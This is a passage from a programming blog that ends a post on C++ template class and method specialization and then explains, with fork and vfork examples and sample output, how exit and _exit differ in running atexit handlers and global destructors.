Otherwise if you don't define method for A<double> and it's used somewhere in this context compiler will rise an error that no member method was defined in class A<double>. Class specialization should be used instead of class method specialization if the specialization changes the behavior of the most members of the class. Doing specialization you are defining new class with the same as template class but optimized for special case. Using the code above the next program
int main(int argc, char **argv)
{
    A<double>()();
    A<double>().method<int>();

    return 0;
}
should produce
A<double#class specialization>::operator ()
A<double#class specialization>::method<i>()
You see that methods from A<double> have been called.

And even in the case of template class specialization you still able to specify its template methods.
template<>
void
A<double>::method<double>()
{
    std::cout << "A<double#class specialization>::method<double#method specialization>()" << std::endl;
}
The program
int main(int argc, char **argv)
{
    A<double>().method<int>();
    A<double>().method<double>();

    return 0;
}
should show on stdout next messages
A<double#class specialization>::method<i>()
A<double#class specialization>::method<double#method specialization>()
At first 'undefined' method of A<double> was called and later specialized one.

Template specialization is a powerful mechanism and should be used with comprehension.

Tuesday, January 6, 2009

c: to exit or to _exit?

There are two functions that allow you to legally terminate your program: exit and _exit.

Both of them immediately terminate the process, close file descriptors, flush all open streams with unwritten buffered data and close all of them, send SIGCHLD signal and return exit code to the parent process if it has no set SA_NOCLDWAIT, or has not set the SIGCHLD handler to SIG_IGN.
If the process is a session leader and its controlling terminal is the controlling terminal of the session, then each process in the foreground process group of this controlling terminal is sent a SIGHUP signal, and the terminal is disassociated from this session, allowing it to be acquired by a new controlling process.

The main difference is that exit calls all functions registered with atexit and on_exit while _exit does not.
Also the threads terminated by a call to _exit() shall not invoke their cancellation cleanup handlers or per-thread data destructors.

It's worth to note that using return from main function has the same behavior as calling exit with the returned value.

How is user or developer is affected by the difference between these calls?
First of all the differences become significant when we are talking about the processes that call fork(or any other routine to create child thread or process).

I read about the side effects of calling exit from the child that caused temporary files unexpectedly removed. I haven't ever been affected by this when I used exit from the child process.
Though I'm trying to use _exit from the child processes.
This sample illustrates the absence of this possible effect at least on my system.

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/wait.h>

int main(int argc, char **argv)
{
    FILE *tmp = tmpfile();

    if (fork() == 0)
    {   
        fprintf(tmp, "Hello from child<%d>!\n", getpid());
        fflush(tmp);
        exit(0);
    }   
    else
    {   
        sleep(1);
        wait(NULL);

        char msg[256];
        fseek(tmp, 0, SEEK_SET);
        fgets(msg, 256, tmp);
        printf("message: %s\n", msg);
    }   
            
    return 0;
}
$./exit 
message: Hello from child<16489>!
The things go worse when we are talking about c++.

Destructors of global and static data are being called on at_exit stage.
After you have called the constructor of global or static object GCC automatically calls the function
int __cxa_atexit(void (* f)(void *), void *p, void *d);
Where f is a function-pointer to the destructor, p is the parameter for the destructor and d is the "home DSO" (DSO = dynamic shared object). When the process exits
void __cxa_finalize(void *d);
should be called with d = 0 in order to destroy all with __cxa_atexit registered objects.

Let's look at some samples that show side effects of calling _exit or exit from both child and parent processes.
Say we have class A that is stored in the global memory region.
#include <iostream>

using namespace std;

class A
{
    public:
        A(){cout << "A(), " << getpid() << endl;}
        ~A(){cout << "~A(), " << getpid() << endl;}
};

A a;
  • The first case is when both child and parent call exit to terminate themselves.
    int main(int argc, char **argv)
    {
        if (fork() == 0)
        {   
            cout << "child, " << getpid() << endl;
            exit(0);
        }   
        else
        {   
            cout << "parent, " << getpid() << endl;
            sleep(1);
            wait(NULL);
            exit(0);
        }   
                
        return 0;
    }
    The output might be
    $./exit
    A(), 17186
    child, 17187
    ~A(), 17187
    parent, 17186
    ~A(), 17186
    You see that the object was constructed once but the destructor was called twice from the child and parent processes. This can cause really bad things.
  • The second case is when the child calls exit and the parent calls _exit.
    int main(int argc, char **argv)
    {
        if (fork() == 0)
        {   
            cout << "child, " << getpid() << endl;
            exit(0);
        }   
        else
        {   
            cout << "parent, " << getpid() << endl;
            sleep(1);
            wait(NULL);
            _exit(0);
        }   
                
        return 0;
    }
    The output might be
    $./exit 
    A(), 17212
    parent, 17212
    child, 17213
    ~A(), 17213
    The constructor was called once from the parent process and destructor was called once but from the child process. You may not notice the effect unless you use object in the parent process. In spite of this it's still dangerous. But this could be used if your forked process is going to become a daemon and parent is no longer needed and will be immediately terminated.
  • The third case is when both child and parent call _exit.
    int main(int argc, char **argv)
    {
        if (fork() == 0)
        {   
            cout << "child, " << getpid() << endl;
            _exit(0);
        }   
        else
        {   
            cout << "parent, " << getpid() << endl;
            sleep(1);
            wait(NULL);
            _exit(0);
        }   
                
        return 0;
    }
    The output might be
    $./exit 
    A(), 17221
    parent, 17221
    child, 17222
    Here constructor was called once but no calls of destructor. This could be fine. But if you are doing something significant in destructor such as closing connections, deleting temporary files, etc. you may run into the trouble.
  • An the last one, that should be correct, is when the child calls _exit and the parent calls exit.
    int main(int argc, char **argv)
    {
        if (fork() == 0)
        {   
            cout << "child, " << getpid() << endl;
            _exit(0);
        }   
        else
        {   
            cout << "parent, " << getpid() << endl;
            sleep(1);
            wait(NULL);
            exit(0);
        }   
                
        return 0;
    }
    The output should be
    $./exit 
    A(), 17234
    child, 17235
    parent, 17234
    ~A(), 17234
    The parent process has created the object and it has destroyed it. The best behavior you can expect.
The behavior changes a bit if you are using vfork instead of fork. The behavior differ with
int main(int argc, char **argv)
{

    if (vfork() == 0)
    {   
        cout << "child, " << getpid() << endl;
        exit(0);
    }   
    else
    {   
        cout << "parent, " << getpid() << endl;
        sleep(1);
        wait(NULL);
        exit(0);
    }   
            
    return 0;
}
The output might look like
$./exit 
A(), 17321
child, 17322
~A(), 17322
parent, 17321
This is similar to the code where the child called exit and the parent called _exit. This is the expected behavior of vfork. With vfork the new process is being created without copying the page tables of the parent process, the parent and child use the same memory pages. The usage of vfork is dangerous first of all. And in the modern systems that use COW technique for forked processes you may not feel the performance reduction.

You can't be 100% sure that you are not using c++ code in your project that could define global variables somewhere. It could be third-party library in your project that uses static or global objects(the singletons, depending on the implementation, could be affected also). So the best practice is to use _exit to return from the child process and use exit(or return from main) to exit from the parent.